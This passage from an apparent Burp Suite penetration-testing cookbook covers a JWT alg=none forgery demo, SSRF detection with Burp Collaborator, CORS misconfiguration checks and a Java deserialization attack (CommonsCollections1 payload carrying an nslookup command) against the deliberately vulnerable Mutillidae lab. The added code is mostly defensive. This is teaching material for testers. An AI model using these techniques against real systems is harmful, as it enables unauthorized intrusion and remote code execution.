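                  now: Optional[float] = None) -> Optional[Dict[str, Any]]:
    """Hardened: the server, not the token, fixes the algorithm, and exp is enforced."""
    header_b64, payload_b64, _ = token.split(".")
    parts = decode_jwt(token)
    if parts["header"].get("alg") != expected_alg:
        return None
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, parts["signature"]):
        return None
    exp = parts["payload"].get("exp")
    now = time.time() if now is None else now
    if exp is None or now >= exp:
        return None                        # the "[exp] Expired check failed" case
    return parts["payload"]


def sample_token() -> str:
    return encode_jwt({"alg": "HS256", "typ": "JWT"}, SAMPLE_CLAIMS, LAB_KEY)


if __name__ == "__main__":
    token = sample_token()
    forged = forge_alg_none(token, aud="ADMIN")
    print("naive verifier accepts forged token:", verify_naive(forged, LAB_KEY) is not None)
    print("strict verifier accepts forged token:", verify_strict(forged, LAB_KEY) is not None)
```

The strict verifier pins the algorithm on the server side; the same rule, 
applied to RS256 tokens, is what stops the related trick of switching alg to 
HS256 and signing with the public key. 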


Using Burp Collaborator to 
determine SSRF 


SSRF is a vulnerability that allows an attacker to make the application issue 
requests on the attacker's behalf, to destinations the attacker could not reach 
directly. These requests can be as simple as DNS queries or as serious as full 
HTTP requests to internal hosts that are not exposed to the attacker. 


In this recipe, we will first run the Burp Collaborator health check to confirm 
which protocols can reach the public Collaborator server from our machine, and 
then use Intruder to determine whether the application will perform DNS 
queries to the public Burp Collaborator server through an SSRF vulnerability. 


Getting ready 


Using the OWASP Mutillidae II DNS lookup page, let's determine whether the 
application has an SSRF vulnerability. 


How to do it... 


1. Switch to the Burp Project options | Misc tab. Note the Burp Collaborator 
Server section. You have options available for using a private Burp 
Collaborator server, which you would set up, or you may use the publicly 
internet-accessible one made available by PortSwigger. For this recipe, we 
will use the public one: 


(Screenshot: Project options | Misc. Below the Scheduled Tasks section, which 
lets you specify tasks that Burp will perform automatically at defined times or 
intervals, is the Burp Collaborator Server section:) 

Burp Collaborator is an external service that Burp can use to help discover 
many kinds of vulnerabilities. You can use the option that is most appropriate 
for you. 

( ) Use the default Collaborator server 
( ) Don't use Burp Collaborator 
( ) Use a private Collaborator server: 
    Server location: 
    Polling location (optional): 
    [ ] Poll over unencrypted HTTP 

[Run health check...] 


2. Check the box labeled Poll over unencrypted HTTP and click the Run health 
check... button. Polling over plain HTTP is only needed where TLS to the 
polling server is broken by an intercepting proxy; the poll responses carry the 
interaction data for your session, so leave the box unchecked on networks you 
do not control: 




3. A pop-up box appears and runs a series of tests to see whether each 
protocol can connect to the public Burp Collaborator server on the internet. 

4. Check the messages for each protocol to see which are successful. Click the 
Close button when you are done: 


Burp Collaborator Health Check 

Initiating health check 
Server address resolution 
Server HTTP connection 
Server HTTPS connection (trust enforced) 
Server HTTPS connection (trust not enforced) 
Server SMTP connection on port 25 
Server SMTP connection on port 587 
Server SMTPS connection (trust enforced) 
Server SMTPS connection (trust not enforced) 
Polling server address resolution 
Polling server connection 
Verify DNS interaction 
Verify HTTP interaction 
Verify HTTPS interaction 
Verify SMTP interaction 
Verify SMTPS interaction 
Server version 


5. From the top-level menu, select Burp | Burp Collaborator client: 


(Screenshot: the Burp menu, whose items are Search, Save copy of project, 
Import project [disk projects only], Rename project, Project options, User 
options, Passwords, Burp Infiltrator, Burp Clickbandit, Burp Collaborator 
client, Save legacy state file, Restore legacy state file and Exit.) 


6. A pop-up box appears. In the section labeled Generate Collaborator 
payloads, change the 1 to 10: 


(Screenshot: the Burp Collaborator client. Click "Copy to clipboard" to 
generate Burp Collaborator payloads that you can use in your own testing. Any 
interactions that result from using the payloads will appear below. Generate 
Collaborator payloads: Number to generate [1], Copy to clipboard, Include 
Collaborator server location. Poll Collaborator interactions: Poll every 60 
seconds, Poll now. The interactions table has #, Time, Type, Payload and 
Comment columns.) 


7. Click the Copy to clipboard button. Leave all other defaults as they are; 
in particular, keep Include Collaborator server location checked so that each 
payload is a complete hostname. Do not close the Collaborator client window: if 
you close it, you lose the client session and the interactions for these 
payloads can no longer be retrieved: 


(Screenshot: the Burp Collaborator client with Number to generate set to 10, 
Include Collaborator server location checked, and Poll every 60 seconds.) 


8. Return to the Firefox browser and navigate to OWASP 2013 | A1 — 
Injection (Other) | HTML Injection (HTMLi) | DNS Lookup: 


(Screenshot: OWASP Mutillidae II, Version 2.6.24, Security Level 0 (Hosed), 
Hints Enabled, Not Logged In. The menu path OWASP 2013 | A1 - Injection 
(Other) | HTML Injection (HTMLi) | DNS Lookup is expanded; sibling items 
include Add to your blog, HTMLi via HTTP Headers, Browser Info and HTMLi Via 
DOM Injection.) 


9. On the DNS Lookup page, type an IP address and click the Lookup DNS 
button: 


(Screenshot: the DNS Lookup page. Who would you like to do a DNS lookup on? 
Enter IP or hostname. Hostname/IP: 192.168.56.101, with a Lookup DNS button. A 
link offers to Switch to SOAP Web Service Version of this Page.) 


10. Switch to the Burp Proxy | HTTP history tab and find the request you just 
created on the DNS Lookup page. Right-click and select the Send to Intruder 
option: 


(Screenshot: the HTTP history entry for POST /mutillidae/index.php?page=dns-lookup.php 
with its context menu open: Send to Spider, Do an active scan, Do a passive 
scan, Send to Intruder, Send to Repeater, Send to Sequencer, Send to Comparer, 
Send to Decoder.) 

11. Switch to the Burp Intruder | Positions tab. Clear all suggested payload 
markers and highlight the IP address, click the Add § button to place 
payload markers around the IP address value of the target_host parameter: 


(Intruder | Positions tab. Configure the positions where payloads will be 
inserted into the base request; the attack type determines the way in which 
payloads are assigned to payload positions. Attack type: Sniper.) 

POST /mutillidae/index.php?page=dns-lookup.php HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.56.101/mutillidae/index.php?page=dns-lookup.php 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 66 
Cookie: showhints=1; PHPSESSID=deudlotk7fvq2ihtlpe449irol; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada 
Connection: close 
Upgrade-Insecure-Requests: 1 

target_host=§192.168.56.101§&dns-lookup-php-submit-button=Lookup+DNS 


12. Switch to the Burp Intruder | Payloads tab and paste the 10 payloads you 
copied to the clipboard from the Burp Collaborator client into the Payload 
Options [Simple list] textbox using the Paste button: 


(Screenshot: Payload Options [Simple list]. This payload type lets you 
configure a simple list of strings that are used as payloads. The list holds 
the ten pasted payloads, each a random label followed by .burpcollaborator.net, 
with Paste, Load, Remove, Clear, Add and Add from list... controls.) 


Make sure you uncheck the Payload Encoding checkbox: Burp's default set of 
characters to URL-encode includes the dot, and a payload with %2e in place of 
each dot is no longer a valid hostname, so the application would never resolve 
it. 


13. Click the Start attack button. The attack results table will pop up as your 
payloads are processing. Allow the attacks to complete. Note the 
burpcollaborator.net URL is placed in the payload marker position of 
the target_host parameter: 
14. Return to the Burp Collaborator client and click the Poll now button to see 
whether any SSRF attacks were successful over any of the protocols. If any 
requests leaked outside of the network, those requests will appear in this 
table along with the specific protocol used. If any requests are shown in this 
table, you will need to report the SSRF vulnerability as a finding. As you 
can see from the results shown here, numerous DNS queries were made by 
the application on behalf of the attacker-provided payloads: 


[Screenshot: Burp Collaborator client, Number to generate: 10, Poll every 60 seconds. The interactions table lists DNS entries timestamped 2018-Sep-15 11:56:34 to 11:56:36 UTC, one per Collaborator payload, and the detail pane reads: The Collaborator server received a DNS lookup of type A for the domain name <payload>.burpcollaborator.net.]


How it works... 


Network leaks and overly generous application parameters can allow an attacker 
to have an application make unauthorized calls via various protocols on the 
attacker's behalf. In the case of this recipe, the application performs DNS 
queries for attacker-supplied hostnames, and those queries leak outside of the 
local machine and reach the internet. 
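The correlation work behind step 14, as an added example that is not part of the book or of Burp: the payload list pasted in step 12 and the Collaborator interaction table are parsed so that each interaction is traced back to the Intruder request that carried it, which is what the finding in the report needs to say. The payload strings and table lines are constructed samples.

```python
import re

# Constructed sample values (not real Collaborator identifiers): the payloads in
# the order they were pasted into the Intruder simple list. In a Sniper attack
# request 0 is the unmodified base request, so payload i drives request i.
PAYLOADS = [
    "aaaa1111bbbb2222.burpcollaborator.net",
    "cccc3333dddd4444.burpcollaborator.net",
    "eeee5555ffff6666.burpcollaborator.net",
]

# Constructed lines in the shape of the Collaborator client's table
# (#, Time, Type, Payload); the leftmost DNS label identifies the payload.
SAMPLE_TABLE = """\
1  2018-Sep-15 11:56:34 UTC  DNS   cccc3333dddd4444
2  2018-Sep-15 11:56:35 UTC  HTTP  cccc3333dddd4444
3  2018-Sep-15 11:56:36 UTC  DNS   eeee5555ffff6666
4  2018-Sep-15 11:56:36 UTC  DNS   zzzz9999zzzz9999.burpcollaborator.net
"""

ROW = re.compile(r"^\s*(\d+)\s+(\S+ \S+) UTC\s+(\S+)\s+(\S+)")


def parse_interactions(text):
    """Turn table lines into dicts; lines that do not fit the shape are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            rows.append({"n": int(m.group(1)), "time": m.group(2),
                         "type": m.group(3).upper(),
                         "label": m.group(4).lower().split(".")[0]})  # drop suffix
    return rows


def correlate(payloads, interactions):
    """Map interactions back to the Intruder request whose payload caused them.

    Returns (hits, unmatched): hits is {request_no: sorted protocol types};
    unmatched holds labels that match none of the pasted payloads."""
    index = {p.lower().split(".")[0]: i + 1 for i, p in enumerate(payloads)}
    hits, unmatched = {}, []
    for row in interactions:
        req = index.get(row["label"])
        if req is None:
            unmatched.append(row["label"])
        else:
            hits.setdefault(req, set()).add(row["type"])
    return {k: sorted(v) for k, v in hits.items()}, unmatched


if __name__ == "__main__":
    hits, unmatched = correlate(PAYLOADS, parse_interactions(SAMPLE_TABLE))
    for req, kinds in sorted(hits.items()):
        print(f"request {req} leaked via {', '.join(kinds)} ({PAYLOADS[req - 1]})")
    print("unmatched labels:", unmatched)
```

A DNS-only hit shows that the application's resolver reached out for the hostname; an HTTP hit for the same request shows the application itself connected, which is the stronger finding.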


See also 


For more information on SSRF attacks, see this PortSwigger blog entry at 
https://portswigger.net/blog/cracking-the-lens-targeting-https-hidden-attack-surface. 


Testing CORS 


An application that implements HTML5 Cross-Origin Resource Sharing (CORS) 
shares browser information with a domain that resides at a different origin. By 
design, browser protections prevent scripts from one origin from accessing 
information belonging to another. This protection is known as the Same-Origin 
Policy (SOP). CORS is a controlled, permissive relaxation of SOP: if an 
application wants to share browser information with a completely different 
domain, it may do so with properly configured CORS headers. 


Web-penetration testers must ensure applications that handle AJAX calls (for 
example, HTML5 applications) do not have misconfigured CORS headers. Let's see how 
Burp can help us identify such misconfigurations. 


Getting ready 


Using the OWASP Mutillidae II AJAX version of the Pen Test Tool Lookup 
page, determine whether the application contains misconfigured CORS headers. 


How to do it... 


1. Navigate to HTML5 | Asynchronous JavaScript and XML | Pen Test Tool 
Lookup (AJAX): 


[Screenshot: OWASP Mutillidae II menu, HTML 5 | Asynchronous JavaScript and XML | Pen Test Tool Lookup (AJAX). The page header reads Pen Test Tool Lookup (AJAX Version), Version: 2.6.24, Security Level: 0 (Hosed), Hints: Enabled.]


2. Select a tool from the listing and click the Lookup Tool button: 


[Screenshot: Pen Test Tool Lookup (AJAX Version) page with the Pen Test Tool drop-down set to XSS Me and the Lookup Tool button below it.]


3. Switch to the Burp Proxy | HTTP history tab and find the request you just 
made from the AJAX Version Pen Test Tool Lookup page. Flip to the 
Response tab: 


[Screenshot: Proxy | HTTP history, Response tab for the lookup request. The response is HTTP/1.1 200 OK with Content-Type: application/json, Content-Length: 295, Cache-Control: no-cache, must-revalidate, and a JSON body whose penTestTools entry describes tool_id 12, XSS Me, a Firefox add-on listed for the Discovery phase.]


4. Let's examine the headers more closely by selecting the Headers tab of the 
same Response tab. Though this is an AJAX request, the call is local to the 
application instead of being made to a cross-origin domain. Thus, no CORS 
headers are present, since none are required. However, if a call to an external 
domain were made (for example, to Google APIs), then CORS headers would 
be required: 


[Screenshot: Headers tab of the same response]

Name             Value 
HTTP/1.1 200 OK 
Date             Fri, 14 Sep 2018 16:54:36 GMT 
Server           Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with 
X-Powered-By     PHP/5.3.2-1ubuntu4.30 
Expires          Mon, 26 Jul 1997 05:00:00 GMT 
Cache-Control    no-cache, must-revalidate 
Pragma           no-cache 
Content-Length   295 
Connection       close 
Content-Type     application/json 


5. In an AJAX request, there may be a call out to an external URL (for example, 
a cross-domain API). In order to permit the external domain to receive DOM 
information from the user's browser session, CORS headers must be 
present, including Access-Control-Allow-Origin: <name of cross 
domain>. 

In the event the CORS header does not specify the name of the external 
domain and instead uses a wildcard (*), this is a vulnerability. Web 
pentesters should include this in their report as a misconfigured CORS 
headers vulnerability. 


How it works... 


Since the AJAX call used in this recipe originated from the same origin, there is 
no need for CORS headers. However, in many cases, AJAX calls are made to 
external domains and require explicit permission through the HTTP response 
Access-Control-Allow-Origin header. 
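An added example (not from the book or from Burp) that applies the check described in step 5 to the headers seen in the Response tab, and goes beyond the wildcard case to the reflected-Origin, null-origin and Allow-Credentials variants a tester should also report. The origins and header sets are constructed samples.

```python
def assess_cors(request_origin, response_headers, trusted_origins=frozenset()):
    """Classify the CORS headers of one HTTP response.

    request_origin   - the Origin header value the tester sent (for example an
                       attacker-style origin such as https://evil.example), or None
    response_headers - header name -> value, as listed in the Burp Headers tab
    trusted_origins  - origins the application legitimately shares data with
    Returns a list of finding strings; an empty list means no CORS issue seen.
    """
    hdrs = {k.lower(): v.strip() for k, v in response_headers.items()}
    acao = hdrs.get("access-control-allow-origin")
    creds = hdrs.get("access-control-allow-credentials", "").lower() == "true"
    vary_origin = "origin" in hdrs.get("vary", "").lower()
    findings = []
    if acao is None:
        # Same-origin AJAX call, as in step 4: no CORS headers are required.
        return findings
    if acao == "*":
        findings.append("wildcard Access-Control-Allow-Origin: any site can read the response")
        if creds:
            findings.append("wildcard combined with Allow-Credentials: true (browsers "
                            "refuse the pair, but it still signals a misconfiguration)")
    elif acao == "null":
        findings.append("Access-Control-Allow-Origin: null is claimable by sandboxed iframes")
    elif request_origin and acao == request_origin and acao not in trusted_origins:
        findings.append("reflects the untrusted request Origin " + acao)
        if not vary_origin:
            findings.append("reflected Origin without Vary: Origin, so caches may "
                            "serve the response to other origins")
    if creds and acao != "*" and acao not in trusted_origins:
        findings.append("credentialed cross-origin read allowed for " + acao)
    return findings


# Constructed headers in the shape of the Mutillidae response from step 3.
SAME_ORIGIN_RESPONSE = {
    "Content-Type": "application/json",
    "Cache-Control": "no-cache, must-revalidate",
}
# Constructed response that echoes whatever Origin it was given, with credentials.
REFLECTING_RESPONSE = {
    "Access-Control-Allow-Origin": "https://evil.example",
    "Access-Control-Allow-Credentials": "true",
    "Content-Type": "application/json",
}

if __name__ == "__main__":
    print(assess_cors("https://evil.example", SAME_ORIGIN_RESPONSE))
    print(assess_cors("https://evil.example", {"Access-Control-Allow-Origin": "*"}))
    print(assess_cors("https://evil.example", REFLECTING_RESPONSE))
```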


See also 


For more information on misconfigured CORS headers, see this PortSwigger 
blog entry at https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties. 


Performing Java deserialization attacks 


Serialization is a mechanism provided in various languages that allows the 
saving of an object's state in binary format. It is used for speed and obfuscation. 
Turning that binary form back into an object is deserialization. In 
cases where user input is used within an object and that object is later serialized, 
this creates an attack vector for arbitrary code injection and possible remote code 
execution. We will look at a Burp extension that assists web-penetration 
testers in assessing applications for Java deserialization vulnerabilities. 


Getting Ready 


Using OWASP Mutillidae II and a hand-crafted serialized code snippet, we will 
demonstrate how to use the Java Serial Killer Burp extension to assist in 
performing Java deserialization attacks. 


How to do it... 


1. Switch to Burp BApp Store and install the Java Serial Killer plugin: 


[Screenshot: Extender | BApp Store tab listing the Java Serial Killer extension with its Installed, Rating, Popularity and Last updated columns.]


In order to create a scenario using a serialized object, we will take a 
standard request and add a serialized object to it for the purposes of 
demonstrating how you can use the extension to add attacker-controlled 
commands to serialized objects. 


2. Note the new tab added to your Burp UI menu at the top dedicated to the 
newly-installed plugin. 
3. Navigate to the Mutillidae homepage. 


4. Switch to the Burp Proxy | HTTP history tab and look for the request you 
just created by browsing to the Mutillidae homepage: 


[Screenshot: Proxy | HTTP history showing GET /mutillidae/ HTTP/1.1 to Host: 192.168.56.101, with the request's right-click context menu open (Send to Spider, Do an active scan, Send to Intruder, Send to Repeater, Send to Sequencer, Send to Comparer, Send to Decoder, Show response in browser, Request in browser, Add Issue, Send selected text to JSON Web Tokens Tab to decode, Do a passive scan).]


Unfortunately, there aren't any serialized objects in Mutillidae so we will 
have to create one ourselves. 


5. Switch to the Decoder tab and copy the following snippet of a serialized 
object: 


AC ED 00 05 73 72 00 OA 53 65 72 69 61 6C 54 65 


6. Paste the hexadecimal numbers into the Decoder tab, click the Encode as... 
button, and select Base64: 


[Screenshot: Decoder tab with the hexadecimal string as input and its Base64 encoding shown in the pane below.]


7. Copy the Base64-encoded value from the Decoder tab and paste it into the 
bottom of the request you sent to the Java Serial Killer tab. Use Ctrl + C to 
copy out of Decoder and Ctrl + V to paste it anywhere in the white space 
area of the request: 


[Screenshot: Java Serial Killer tab with an empty Command field and the GET /mutillidae/ HTTP/1.1 request to Host: 192.168.56.101 in the editor.]


8. Within the Java Serial Killer tab, pick a Java library from the drop-down 
list. For this recipe, we will use CommonsCollections1. Check the Base64 
Encode box. Add a command to embed into the serialized object. In this 
example, we will use the nslookup 127.0.0.1 command. Highlight the 
payload and click the Serialize button: 


[Screenshot: Java Serial Killer tab showing the GET /mutillidae/ HTTP/1.1 request before serialization.]


9. After clicking the Serialize button, notice the payload has changed and now 
contains your arbitrary command and is Base64-encoded: 


[Screenshot: Java Serial Killer tab with Base64 Encode checked, CommonsCollections1 selected and Command: nslookup 127.0.0.1. The GET /mutillidae/ HTTP/1.1 request now carries Content-Length: 1880 followed by the Base64-encoded serialized payload, which begins rO0AB (the Base64 form of the AC ED 00 05 stream magic).]


10. Click the Go button within the Java Serial Killer tab to execute the payload. 
Even though you may receive an error in the response, ideally you would 
have a listener, such as tcpdump, capturing any DNS lookups on port 53. 
On that listener, you would see the DNS query for the IP address you 
specified in the nslookup command. 


How it works... 


In cases where application code receives user input directly into an object 
without performing sanitization on that input, an attacker has the opportunity to 
provide arbitrary commands. The input is serialized, and when the application 
later deserializes it, the embedded command runs on the operating system where 
the application resides, creating a possible attack vector for remote code execution. 
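An added example, not from the book or from the Java Serial Killer extension, for spotting a serialized Java object in a request body on the defending side: it recognises the AC ED 00 05 stream magic raw, Base64-encoded (the rO0AB prefix of the step 9 payload) and as hex text like the step 5 snippet, and pulls out the name of the class being deserialized so it can be logged or compared against an allowlist. org.example.Foo is a made-up class name and the sample bodies are constructed.

```python
import base64
import re
import struct

# Java serialization header: STREAM_MAGIC 0xACED then STREAM_VERSION 5, i.e. the
# "AC ED 00 05" that opens the snippet in step 5.
STREAM_MAGIC = b"\xac\xed\x00\x05"
TC_OBJECT, TC_CLASSDESC = 0x73, 0x72
# Base64 of any stream that starts with the magic begins with these 5 characters.
B64_MAGIC = re.compile(rb"rO0AB[A-Za-z0-9+/]{4,}={0,2}")
# Hex text with or without separators ("AC ED 00 05 ..." or "aced0005...").
HEX_MAGIC = re.compile(rb"(?i)ac\s*ed\s*00\s*05(?:\s*[0-9a-f]{2})*")


def first_class_name(stream):
    """Class name of the first object in a serialized stream, or None.
    Handles the common TC_OBJECT + TC_CLASSDESC layout only; a truncated
    stream (like the step 5 snippet) yields the part of the name present."""
    if not stream.startswith(STREAM_MAGIC) or len(stream) < 8:
        return None
    if stream[4] != TC_OBJECT or stream[5] != TC_CLASSDESC:
        return None
    (length,) = struct.unpack(">H", stream[6:8])  # modified UTF-8 length prefix
    return stream[8:8 + length].decode("utf-8", errors="replace")


def find_java_serialized(body):
    """Find a Java serialized object in a request body.
    Returns (encoding, class_name) with encoding "raw", "base64" or "hex", or
    None. Hex matching can false-positive on hashes, so treat it as a lead."""
    if body.startswith(STREAM_MAGIC):
        return "raw", first_class_name(body)
    m = B64_MAGIC.search(body)
    if m:
        text = m.group(0).rstrip(b"=")
        try:
            stream = base64.b64decode(text + b"=" * (-len(text) % 4))
            return "base64", first_class_name(stream)
        except ValueError:
            pass  # not valid Base64 after all; fall through to the hex check
    m = HEX_MAGIC.search(body)
    if m:
        stream = bytes.fromhex(re.sub(rb"\s+", b"", m.group(0)).decode("ascii"))
        return "hex", first_class_name(stream)
    return None


# Constructed sample bodies: a stream for a made-up class, the same stream
# Base64-encoded inside a form field, and the hex text from step 5.
RAW_BODY = b"\xac\xed\x00\x05\x73\x72\x00\x0forg.example.Foo"
B64_BODY = b"payload=" + base64.b64encode(RAW_BODY)
HEX_BODY = b"AC ED 00 05 73 72 00 0A 53 65 72 69 61 6C 54 65"

if __name__ == "__main__":
    for body in (RAW_BODY, B64_BODY, HEX_BODY, b'{"toolIDRequested": "12"}'):
        print(find_java_serialized(body))
```

Note that step 6 Base64-encodes the hex text rather than the bytes it denotes, so that value starts with QUMg, not rO0AB; the hex branch above is what catches it.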


There's more... 


Since this recipe scenario is a bit contrived, you may not receive a response on 
your network listener for the nslookup command. Try the recipe again after 
downloading a vulnerable version of an application with known Java 
deserialization vulnerabilities (for example, Jenkins or JBoss). Reuse the same steps 
shown here, only changing the target application. 


See also 


* For more information about real-world Java deserialization attacks, check 
out these links: 
  - Symantec: https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=30326 
  - Foxglove Security: https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ 
* To read more about this Burp plugin, check out https://blog.netspi.com/java-deserialization-attacks-burp/ 